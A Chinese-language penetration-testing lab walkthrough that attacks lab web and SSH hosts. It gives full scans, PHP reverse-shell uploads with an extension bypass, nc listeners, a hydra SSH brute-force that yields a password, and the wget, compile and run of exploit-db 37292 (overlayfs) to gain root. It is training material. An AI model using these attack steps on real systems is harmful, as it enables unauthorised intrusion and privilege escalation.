滲透測試基本技術 第三章 (004)

下一題:

起手式nmap:

┌──(kali㉿kali)-[~]
└─$ sudo -i
[sudo] password for kali:
┌──(root㉿kali)-[~]
└─# nmap -p- 172.16.1.134
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-17 20:34 EDT
Nmap scan report for market.itop.com.tw (172.16.1.134)
Host is up (0.064s latency).
Not shown: 65534 closed tcp ports (reset)
PORT   STATE SERVICE
80/tcp open  http

Nmap done: 1 IP address (1 host up) scanned in 29.74 seconds

┌──(root㉿kali)-[~]
└─# nmap -p- 172.16.1.153
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-17 20:36 EDT
Nmap scan report for hr.itop.com.tw (172.16.1.153)
Host is up (0.054s latency).
Not shown: 65534 closed tcp ports (reset)
PORT   STATE SERVICE
80/tcp open  http

Nmap done: 1 IP address (1 host up) scanned in 30.64 seconds

┌──(root㉿kali)-[~]
└─# nmap -p80 -sC -sV -O -A 172.16.1.134 172.16.1.153
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-17 20:37 EDT
Nmap scan report for market.itop.com.tw (172.16.1.134)
Host is up (0.025s latency).

PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
|_http-title: Maket web Site
|_http-server-header: Apache/2.4.7 (Ubuntu)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.2.0 (94%), Linux 3.11 - 4.1 (94%), Linux 4.4 (94%), Linux 3.10 - 3.16 (93%), Linux 3.16 (93%), Linux 3.13 (91%), Linux 3.18 (90%), Linux 4.0 (90%), Linux 3.10 - 3.12 (89%), Linux 3.10 - 4.11 (89%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops

TRACEROUTE (using port 80/tcp)
HOP RTT      ADDRESS
1   61.38 ms 192.168.200.1
2   11.42 ms market.itop.com.tw (172.16.1.134)

Nmap scan report for hr.itop.com.tw (172.16.1.153)
Host is up (0.051s latency).

PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
|_http-server-header: Apache/2.4.7 (Ubuntu)
| http-cookie-flags:
|   /:
|     PHPSESSID:
|_      httponly flag not set
| http-title: Ice Hrm Login
|_Requested resource was http://hr.itop.com.tw/app/login.php
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.2.0 (94%), Linux 3.11 - 4.1 (94%), Linux 4.4 (94%), Linux 3.10 - 3.16 (93%), Linux 3.16 (92%), Linux 3.13 (90%), Linux 3.10 - 4.11 (89%), Linux 3.12 (89%), Linux 3.13 or 4.2 (89%), Linux 3.16 - 4.6 (89%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops

TRACEROUTE (using port 80/tcp)
HOP RTT      ADDRESS
-   Hop 1 is the same as for 172.16.1.134
2   61.44 ms hr.itop.com.tw (172.16.1.153)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 2 IP addresses (2 hosts up) scanned in 12.77 seconds

發現有網址，所以需要改一下ip的對照表:

┌──(root㉿kali)-[~]
└─# vim /etc/hosts

要新增如下圖紅線:

這樣才能連的到:

用admin/admin登入:

這個cms是可以提供上傳頭像，所以先找找reverse shell的php:

┌──(root㉿kali)-[~]
└─# cd /home/kali/PT_day3

┌──(root㉿kali)-[/home/kali/PT_day3]
└─# ls -al
total 52
drwxr-xr-x  2 root root 4096 Mar 12 03:25 .
drwxr-xr-x 22 kali kali 4096 Mar 17 20:31 ..
-rw-r--r--  1 root root 5036 Mar 11 23:59 42558-1.py
-rwxr-xr-x  1 root root 4925 Mar 11 23:54 42558.py
-rwxr-xr-x  1 root root 3680 Mar 11 23:08 44156.py
-rwxr-xr-x  1 root root 1836 Mar 12 01:37 50477.py
-rwxr-xr-x  1 root root 5495 Feb 27 06:38 bbb_reverse.php
-rwxr-xr-x  1 root root  996 Mar 11 21:03 freeswitch.py
-rwxr-xr-x  1 root root 5495 Mar 12 03:21 php-reverse-shell.jpg

┌──(root㉿kali)-[/home/kali/PT_day3]
└─# cp /usr/share/webshells/php/php-reverse-shell.php .

┌──(root㉿kali)-[/home/kali/PT_day3]
└─# ls -al
total 60
drwxr-xr-x  2 root root 4096 Mar 17 20:58 .
drwxr-xr-x 22 kali kali 4096 Mar 17 20:31 ..
-rw-r--r--  1 root root 5036 Mar 11 23:59 42558-1.py
-rwxr-xr-x  1 root root 4925 Mar 11 23:54 42558.py
-rwxr-xr-x  1 root root 3680 Mar 11 23:08 44156.py
-rwxr-xr-x  1 root root 1836 Mar 12 01:37 50477.py
-rwxr-xr-x  1 root root 5495 Feb 27 06:38 bbb_reverse.php
-rwxr-xr-x  1 root root  996 Mar 11 21:03 freeswitch.py
-rwxr-xr-x  1 root root 5495 Mar 12 03:21 php-reverse-shell.jpg
-rwxr-xr-x  1 root root 5496 Mar 17 20:58 php-reverse-shell.php

┌──(root㉿kali)-[/home/kali/PT_day3]
└─# mv php-reverse-shell.php ccc_reverse.php

┌──(root㉿kali)-[/home/kali/PT_day3]
└─# vim ccc_reverse.php

aaa注意一下現在我們的IP:

改一下:

到下圖上傳:

注意先改一下附檔名:

┌──(root㉿kali)-[/home/kali/PT_day3]
└─# mv ccc_reverse.php ccc_reverse.jpg

並開啟攔截:

上傳:

等上傳時，把攔截到的檔案的副檔名改掉:

依下圖順序操作:

再切到以下畫面，上傳後的位址在下圖紅線處:

記得，觸發前要先監聽:

┌──(root㉿kali)-[~]
└─# nc -lvnp 1234
listening on [any] 1234 ...

網址列打上後按Enter觸發:

成功反彈:

┌──(root㉿kali)-[~]
└─# nc -lvnp 1234
listening on [any] 1234 ...
connect to [192.168.200.7] from (UNKNOWN) [172.16.1.153] 44256
Linux ubuntu 4.4.0-31-generic #50~14.04.1-Ubuntu SMP Wed Jul 13 01:07:32 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux
 09:29:27 up  6:33,  2 users,  load average: 0.13, 0.14, 0.09
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
jason    :0       :0               17Apr21 ?xdm?  34:31   0.11s init --user
jason    pts/12   :0               17Apr21 249days  0.10s  1.38s gnome-terminal
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$

穩定shell:

$ python -c 'import pty;pty.spawn("/bin/bash")'
www-data@ubuntu:/$ gcc -v
gcc -v
The program 'gcc' is currently not installed. To run 'gcc' please ask your administrator to install the package 'gcc'

這一台沒用，沒有gcc，再去打打看134。

既然是網頁，那就看看它藏了什麼目錄:

┌──(root㉿kali)-[/home/kali/PT_day3]
└─# nikto -host http://172.16.1.134
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          172.16.1.134
+ Target Hostname:    172.16.1.134
+ Target Port:        80
+ Start Time:         2023-03-17 21:44:41 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.7 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Server may leak inodes via ETags, header found with file /, inode: 2cf6, size: 597701736c404, mtime: gzip
+ Apache/2.4.7 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS
+ OSVDB-3233: /icons/README: Apache default file found.
+ 7923 requests: 0 error(s) and 7 item(s) reported on remote host
+ End Time:           2023-03-17 21:47:29 (GMT-4) (168 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

┌──(root㉿kali)-[/home/kali/PT_day3]
└─# dirb http://172.16.1.134

-----------------
DIRB v2.22
By The Dark Raver
-----------------

START_TIME: Fri Mar 17 21:48:55 2023
URL_BASE: http://172.16.1.134/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://172.16.1.134/ ----
+ http://172.16.1.134/index.html (CODE:200|SIZE:11510)
+ http://172.16.1.134/server-status (CODE:403|SIZE:292)

-----------------
END_TIME: Fri Mar 17 21:49:51 2023
DOWNLOADED: 4612 - FOUND: 2

同樣的也要改一下表，這樣才連的上去:

┌──(root㉿kali)-[/home/kali/PT_day3]
└─# vim /etc/hosts

要改的如下紅圈處:

連上以後也沒什麼東西:

所以一樣暴力破解:

┌──(root㉿kali)-[~]
└─# dirb http://market.itop.com.tw

-----------------
DIRB v2.22
By The Dark Raver
-----------------

START_TIME: Mon Feb 27 00:41:28 2023
URL_BASE: http://market.itop.com.tw/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://market.itop.com.tw/ ----
==> DIRECTORY: http://market.itop.com.tw/admin/
+ http://market.itop.com.tw/index.html (CODE:200|SIZE:141)
+ http://market.itop.com.tw/server-status (CODE:403|SIZE:298)

---- Entering directory: http://market.itop.com.tw/admin/ ----
==> DIRECTORY: http://market.itop.com.tw/admin/fckeditor/
+ http://market.itop.com.tw/admin/index.html (CODE:200|SIZE:141)

---- Entering directory: http://market.itop.com.tw/admin/fckeditor/ ----
==> DIRECTORY: http://market.itop.com.tw/admin/fckeditor/editor/
+ http://market.itop.com.tw/admin/fckeditor/index.html (CODE:200|SIZE:141)

---- Entering directory: http://market.itop.com.tw/admin/fckeditor/editor/ ----
==> DIRECTORY: http://market.itop.com.tw/admin/fckeditor/editor/_source/
==> DIRECTORY: http://market.itop.com.tw/admin/fckeditor/editor/css/
==> DIRECTORY: http://market.itop.com.tw/admin/fckeditor/editor/dialog/
==> DIRECTORY: http://market.itop.com.tw/admin/fckeditor/editor/filemanager/
==> DIRECTORY: http://market.itop.com.tw/admin/fckeditor/editor/images/
+ http://market.itop.com.tw/admin/fckeditor/editor/index.html (CODE:200|SIZE:141)
==> DIRECTORY: http://market.itop.com.tw/admin/fckeditor/editor/js/
==> DIRECTORY: http://market.itop.com.tw/admin/fckeditor/editor/lang/
==> DIRECTORY: http://market.itop.com.tw/admin/fckeditor/editor/plugins/
==> DIRECTORY: http://market.itop.com.tw/admin/fckeditor/editor/skins/

---- Entering directory: http://market.itop.com.tw/admin/fckeditor/editor/_source/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://market.itop.com.tw/admin/fckeditor/editor/css/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://market.itop.com.tw/admin/fckeditor/editor/dialog/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://market.itop.com.tw/admin/fckeditor/editor/filemanager/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://market.itop.com.tw/admin/fckeditor/editor/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://market.itop.com.tw/admin/fckeditor/editor/js/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://market.itop.com.tw/admin/fckeditor/editor/lang/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://market.itop.com.tw/admin/fckeditor/editor/plugins/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://market.itop.com.tw/admin/fckeditor/editor/skins/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

-----------------
END_TIME: Mon Feb 27 00:48:38 2023
DOWNLOADED: 18448 - FOUND: 5

查到有一個上傳用的頁面，依照下圖數字順序操作:

開啟burp suite來攔截:

aaa先把剛剛用過的jpg改回php:

┌──(root㉿kali)-[/home/kali/PT_day3]
└─# mv ccc_reverse.jpg ccc_reverse.php

上傳:

aaa這一次不用特別改什麼，就上傳就好:

觸發前當然要先監聽:

┌──(root㉿kali)-[~]
└─# nc -lvnp 1234
listening on [any] 1234 ...

正式觸發:

成功反彈:

┌──(root㉿kali)-[~]
└─# nc -lvnp 1234
listening on [any] 1234 ...
connect to [192.168.200.7] from (UNKNOWN) [172.16.1.134] 59482
Linux ubuntu 4.4.0-31-generic #50~14.04.1-Ubuntu SMP Wed Jul 13 01:07:32 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux
 10:13:15 up 1 day,  2:10,  2 users,  load average: 0.12, 0.09, 0.04
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
jason    :0       :0               16Apr21 ?xdm?   1:03m  0.10s init --user
jason    pts/0    :0               15Dec21 457days  0.04s  0.04s bash
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$

但一樣沒有gcc:

$ gcc
/bin/sh: 1: gcc: not found

所以這一次開始大規模的掃:

┌──(root㉿kali)-[/home/kali/PT_day3]
└─# nmap -F 172.16.1-20.*
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-17 22:20 EDT
Nmap scan report for 172.16.1.51
Host is up (0.026s latency).
Not shown: 89 filtered tcp ports (no-response), 8 filtered tcp ports (host-prohibited)
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
3306/tcp open  mysql

Nmap scan report for 172.16.1.67
Host is up (0.037s latency).
All 100 scanned ports on 172.16.1.67 are in ignored states.
Not shown: 100 closed tcp ports (reset)

Nmap scan report for 172.16.1.87
Host is up (0.042s latency).
Not shown: 90 closed tcp ports (reset)
PORT      STATE SERVICE
80/tcp    open  http
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
49152/tcp open  unknown
49153/tcp open  unknown
49154/tcp open  unknown
49155/tcp open  unknown
49156/tcp open  unknown
49157/tcp open  unknown

Nmap scan report for 172.16.1.105
Host is up (0.037s latency).
Not shown: 88 closed tcp ports (reset)
PORT      STATE SERVICE
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
3306/tcp  open  mysql
5060/tcp  open  sip
8081/tcp  open  blackice-icecap
49152/tcp open  unknown
49153/tcp open  unknown
49154/tcp open  unknown
49155/tcp open  unknown
49156/tcp open  unknown
49157/tcp open  unknown

Nmap scan report for 172.16.1.112
Host is up (0.036s latency).
Not shown: 96 closed tcp ports (reset)
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
3389/tcp open  ms-wbt-server

Nmap scan report for 172.16.1.120
Host is up (0.035s latency).
Not shown: 92 closed tcp ports (reset)
PORT     STATE SERVICE
22/tcp   open  ssh
25/tcp   open  smtp
53/tcp   open  domain
110/tcp  open  pop3
139/tcp  open  netbios-ssn
143/tcp  open  imap
445/tcp  open  microsoft-ds
8081/tcp open  blackice-icecap

Nmap scan report for market.itop.com.tw (172.16.1.134)
Host is up (0.035s latency).
Not shown: 99 closed tcp ports (reset)
PORT   STATE SERVICE
80/tcp open  http

Nmap scan report for hr.itop.com.tw (172.16.1.153)
Host is up (0.035s latency).
Not shown: 99 closed tcp ports (reset)
PORT   STATE SERVICE
80/tcp open  http

Nmap scan report for 172.16.1.157
Host is up (0.025s latency).
Not shown: 97 filtered tcp ports (no-response)
PORT    STATE  SERVICE
22/tcp  open   ssh
80/tcp  open   http
443/tcp closed https

Nmap scan report for 172.16.1.191
Host is up (0.037s latency).
Not shown: 95 closed tcp ports (reset)
PORT     STATE SERVICE
80/tcp   open  http
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
8888/tcp open  sun-answerbook

Nmap scan report for wpress.itop.com.tw (172.16.1.222)
Host is up (0.038s latency).
Not shown: 99 closed tcp ports (reset)
PORT   STATE SERVICE
80/tcp open  http

Nmap scan report for 172.16.3.124
Host is up (0.034s latency).
Not shown: 95 filtered tcp ports (no-response)
PORT    STATE SERVICE
21/tcp  open  ftp
80/tcp  open  http
135/tcp open  msrpc
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds

Nmap scan report for 172.16.3.125
Host is up (0.037s latency).
Not shown: 99 closed tcp ports (reset)
PORT     STATE SERVICE
3389/tcp open  ms-wbt-server

Nmap scan report for 172.16.3.126
Host is up (0.035s latency).
Not shown: 98 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

Nmap scan report for 172.16.3.128
Host is up (0.033s latency).
Not shown: 99 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh

Nmap scan report for 172.16.5.1
Host is up (0.033s latency).
Not shown: 94 closed tcp ports (reset)
PORT     STATE SERVICE
53/tcp   open  domain
80/tcp   open  http
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
3389/tcp open  ms-wbt-server

Nmap scan report for 172.16.19.2
Host is up (0.034s latency).
Not shown: 91 closed tcp ports (reset)
PORT      STATE SERVICE
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
5357/tcp  open  wsdapi
49152/tcp open  unknown
49153/tcp open  unknown
49154/tcp open  unknown
49155/tcp open  unknown
49156/tcp open  unknown

Nmap scan report for 172.16.19.9
Host is up (0.035s latency).
Not shown: 90 closed tcp ports (reset)
PORT      STATE SERVICE
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
3389/tcp  open  ms-wbt-server
49152/tcp open  unknown
49153/tcp open  unknown
49154/tcp open  unknown
49155/tcp open  unknown
49156/tcp open  unknown
49157/tcp open  unknown

Nmap scan report for 172.16.20.3
Host is up (0.034s latency).
Not shown: 99 closed tcp ports (reset)
PORT   STATE SERVICE
80/tcp open  http

Nmap scan report for 172.16.20.6
Host is up (0.035s latency).
Not shown: 98 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

Nmap scan report for 172.16.20.7
Host is up (0.036s latency).
Not shown: 99 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh

Nmap done: 5120 IP addresses (21 hosts up) scanned in 51.91 seconds

打打看其中一個:

┌──(root㉿kali)-[/home/kali/PT_day3]
└─# nmap -p- 172.16.3.128
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-17 22:22 EDT
Nmap scan report for 172.16.3.128
Host is up (0.059s latency).
Not shown: 65534 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh

Nmap done: 1 IP address (1 host up) scanned in 30.61 seconds

┌──(root㉿kali)-[/home/kali/PT_day3]
└─# nmap -p22 172.16.3.128 -sC -sV -O -A
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-17 22:29 EDT
Nmap scan report for 172.16.3.128
Host is up (0.020s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.13 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   1024 ce8eb17409f0e9ac520810f2d82eb6e0 (DSA)
|   2048 a2c1d9a1e1f7302eae85cb050c3559ed (RSA)
|   256 0d8658bbfb1c322e0d70f95cf1e13eca (ECDSA)
|_  256 b6e04ffd17be8f891da29a0cfe45a3ef (ED25519)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.2.0 (94%), Linux 3.11 - 4.1 (94%), Linux 4.4 (94%), Linux 3.10 - 3.16 (93%), Linux 3.16 (93%), Linux 3.13 (91%), Linux 3.18 (90%), Linux 3.10 - 3.12 (89%), Linux 3.10 - 4.11 (89%), Linux 3.12 (89%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 22/tcp)
HOP RTT      ADDRESS
1   62.84 ms 192.168.200.1
2   11.76 ms 172.16.3.128

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 5.95 seconds

只有ssh有開，hydra爆帳密給它死:

┌──(root㉿kali)-[/home/kali/PT_day3]
└─# hydra -l jason -P /usr/share/seclists/Passwords/xato-net-10-million-passwords-1000000.txt ssh://172.16.3.128
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-03-17 22:31:38
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 1000000 login tries (l:1/p:1000000), ~62500 tries per task
[DATA] attacking ssh://172.16.3.128:22/
[STATUS] 82.00 tries/min, 82 tries in 00:01h, 999921 to do in 203:15h, 13 active
[STATUS] 92.00 tries/min, 276 tries in 00:03h, 999727 to do in 181:07h, 13 active
[22][ssh] host: 172.16.3.128   login: jason   password: apollo
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 9 final worker threads did not complete until end.
[ERROR] 9 targets did not resolve or could not be connected
[ERROR] 0 target did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-03-17 22:37:17

┌──(root㉿kali)-[/home/kali/PT_day3]
└─# ssh jason@172.16.3.128
jason@172.16.3.128's password:
Welcome to Ubuntu 14.04 LTS (GNU/Linux 3.13.0-24-generic x86_64)

 * Documentation:  https://help.ubuntu.com/

775 packages can be updated.
483 updates are security updates.

Last login: Sat Oct 29 16:20:08 2022 from 192.168.200.15
jason@Ubuntu14:~$

順利get shell後，當然是看看能不能提權，所以要把枚舉工具送進去:

┌──(root㉿kali)-[~]
└─# cd /home/kali

┌──(root㉿kali)-[/home/kali]
└─# ls -al
total 1040
drwxr-xr-x 22 kali kali   4096 Mar 17 21:29 .
drwxr-xr-x  4 root root   4096 Jan 15 00:59 ..
-rw-r--r--  1 kali kali    220 Aug  8  2022 .bash_logout
-rw-r--r--  1 kali kali   5551 Aug  8  2022 .bashrc
-rw-r--r--  1 kali kali   3526 Aug  8  2022 .bashrc.original
drwx------  6 kali kali   4096 Feb 19 07:36 .BurpSuite
drwxr-xr-x 10 kali kali   4096 Feb 19 04:23 .cache
drwxr-xr-x 15 kali kali   4096 Feb 27 06:51 .config
-rw-r--r--  1 kali kali  13176 Mar 12 04:32 cve-2017-16995.c
-rw-r--r--  1 kali kali   4715 Mar 11 03:16 cyberlab.ovpn
drwxr-xr-x  2 kali kali   4096 Dec 10 01:17 Desktop
-rw-r--r--  1 kali kali     35 Nov  7 06:23 .dmrc
drwxr-xr-x  2 kali kali   4096 Nov  7 06:23 Documents
drwxr-xr-x  2 kali kali   4096 Mar 11 03:17 Downloads
-rw-r--r--  1 kali kali  11759 Aug  8  2022 .face
lrwxrwxrwx  1 kali kali      5 Aug  8  2022 .face.icon -> .face
drwx------  3 kali kali   4096 Nov  7 06:23 .gnupg
-rw-------  1 kali kali      0 Nov  7 06:23 .ICEauthority
drwxr-xr-x  4 kali kali   4096 Feb 19 05:32 .java
-rw-r--r--  1 kali kali  46631 Mar 12 04:03 LinEnum.sh
-rw-r--r--  1 root root 776167 Apr 17  2022 linpeas.sh
drwx------  3 kali kali   4096 Nov  7 06:23 .local
drwx------  5 kali kali   4096 Nov 13 02:21 .mozilla
drwxr-xr-x 10 kali kali   4096 Feb 26 07:08 .msf4
drwxr-xr-x  2 kali kali   4096 Nov  7 06:23 Music
-rw-------  1 kali kali    103 Dec 10 22:12 .mysql_history
drwxr-xr-x  2 kali kali   4096 Feb 26 06:43 Pictures
-rw-r--r--  1 kali kali    807 Aug  8  2022 .profile
drwxr-xr-x  2 root root   4096 Mar 17 22:36 PT_day3
drwxr-xr-x  2 kali kali   4096 Nov  7 06:23 Public
drwx------  2 kali kali   4096 Jan 15 01:42 .ssh
-rw-r--r--  1 kali kali      0 Nov 13 05:38 .sudo_as_admin_successful
drwxr-xr-x  5 kali kali   4096 Dec 31 01:50 target_machine
drwxr-xr-x  2 kali kali   4096 Nov  7 06:23 Templates
-rw-r-----  1 kali kali      4 Mar 17 20:27 .vboxclient-clipboard.pid
-rw-r-----  1 kali kali      5 Mar 17 20:27 .vboxclient-display-svga-x11.pid
-rw-r-----  1 kali kali      4 Mar 17 20:27 .vboxclient-draganddrop.pid
-rw-r-----  1 kali kali      4 Mar 17 20:27 .vboxclient-seamless.pid
-rw-r-----  1 kali kali      4 Mar 17 20:27 .vboxclient-vmsvga-session-tty7.pid
drwxr-xr-x  2 kali kali   4096 Nov  7 06:23 Videos
-rw-------  1 kali kali   1988 Dec 10 00:41 .viminfo
drwxr-xr-x  2 kali kali   4096 Nov 13 02:19 vulnOSv2
-rw-r--r--  1 kali kali    180 Mar 12 04:03 .wget-hsts
-rw-------  1 kali kali    299 Mar 17 21:29 .Xauthority
-rw-------  1 kali kali   8473 Mar 17 21:10 .xsession-errors
-rw-------  1 kali kali   8520 Mar 12 03:50 .xsession-errors.old
-rw-------  1 kali kali   8644 Mar 12 04:46 .zsh_history
-rw-r--r--  1 kali kali  10877 Aug  8  2022 .zshrc

┌──(root㉿kali)-[/home/kali]
└─# python -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
172.16.3.128 - - [17/Mar/2023 22:42:02] "GET /linpeas.sh HTTP/1.1" 200 -

移到tmp資料夾，才准許寫入:(linpeas的結果太長，所以不貼)

總之有CVE-2015-8660 overlayfs。

上exploit-db查一下:

看看下面紅圈，應該很類似現在這一台靶機的環境:

可以用下圖方式下載poc:

也可以利用EDB-ID在本機找:

┌──(root㉿kali)-[/home/kali/PT_day3]
└─# searchsploit -m 37292
  Exploit: Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04) - 'overlayfs' Local Privilege Escalation
      URL: https://www.exploit-db.com/exploits/37292
     Path: /usr/share/exploitdb/exploits/linux/local/37292.c
    Codes: CVE-2015-1328
 Verified: True
File Type: C source, ASCII text, with very long lines (466)
Copied to: /home/kali/PT_day3/37292.c

同樣的在poc所在資料夾開簡易server:

┌──(root㉿kali)-[/home/kali/PT_day3]
└─# python -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...

讓靶機下載腳本:

jason@Ubuntu14:/tmp$ wget http://192.168.200.7/37292.c
--2022-10-29 21:49:39--  http://192.168.200.7/37292.c
Connecting to 192.168.200.7:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 4968 (4.9K) [text/x-csrc]
Saving to: ‘37292.c’

100%[======================================================>] 4,968       --.-K/s   in 0.008s

2022-10-29 21:49:39 (594 KB/s) - ‘37292.c’ saved [4968/4968]

jason@Ubuntu14:/tmp$ gcc 37292.c -o ofs
jason@Ubuntu14:/tmp$ ls -l
total 984
-rw-rw-r-- 1 jason  jason    4968  3月 18  2023 37292.c
-rwxrwxr-x 1 jason  jason  776167  4月 17  2022 linpeas.sh
-rw-rw-r-- 1 jason  jason  197924 10月 29 21:20 linpeas.txt
-rwxrwxr-x 1 jason  jason   13644 10月 29 21:50 ofs
drwx------ 2 apollo apollo   4096 12月 15  2021 ssh-p8kd9p9WZt8t
-rw-rw-r-- 1 apollo apollo      0 12月 15  2021 unity_support_test.1
jason@Ubuntu14:/tmp$ ./ofs
spawning threads
mount #1
mount #2
child threads done
/etc/ld.so.preload created
creating shared library
# whoami
root

也可以試試scp來下載檔案。剛剛的兩台機器也應該有一樣的弱點，但如果直接把172.16.3.128的ofs執行檔給複製過去，會發現沒法用，因為CPU不同。